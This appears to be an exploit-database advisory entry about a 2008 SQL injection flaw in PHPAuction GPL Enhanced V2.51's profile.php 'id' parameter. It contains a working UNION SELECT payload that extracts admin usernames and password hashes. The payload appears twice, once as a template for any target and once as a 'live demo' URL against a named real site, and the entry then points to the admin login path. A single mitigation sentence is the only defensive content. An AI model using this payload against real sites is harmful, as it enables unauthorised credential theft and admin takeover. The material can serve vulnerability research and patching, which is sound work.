PHPAuction GPL Enhanced V2.51 (profile.php id) Remote SQL Injection Vulnerability

vendor:

PHPAuction GPL Enhanced

by:

Hussin X

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: PHPAuction GPL Enhanced

Affected Version From: V2.51

Affected Version To: V2.51

Patch Exists: YES

Related CWE: N/A

CPE: a:phpauction:phpauction_gpl_enhanced

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHPAuction GPL Enhanced V2.51 (profile.php id) Remote SQL Injection Vulnerability

A vulnerability exists in PHPAuction GPL Enhanced V2.51 which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'profile.php' script. An attacker can exploit this vulnerability to gain access to the admin panel and gain access to sensitive information such as usernames and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| PHPAuction GPL Enhanced V2.51 (profile.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://phpauctions.info/
|
| DorK   : /:)
|___________________________________________________|

Exploit:  



www.[target].com/Script/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers--


L!VE DEMO: :


http://phpauctions.info/phpauction/demo/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers--


___________________

admin login :

www.[target].com/Script/admin/
___________________
password : md5
___________________


____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|   
| CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n 
|
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-08-01]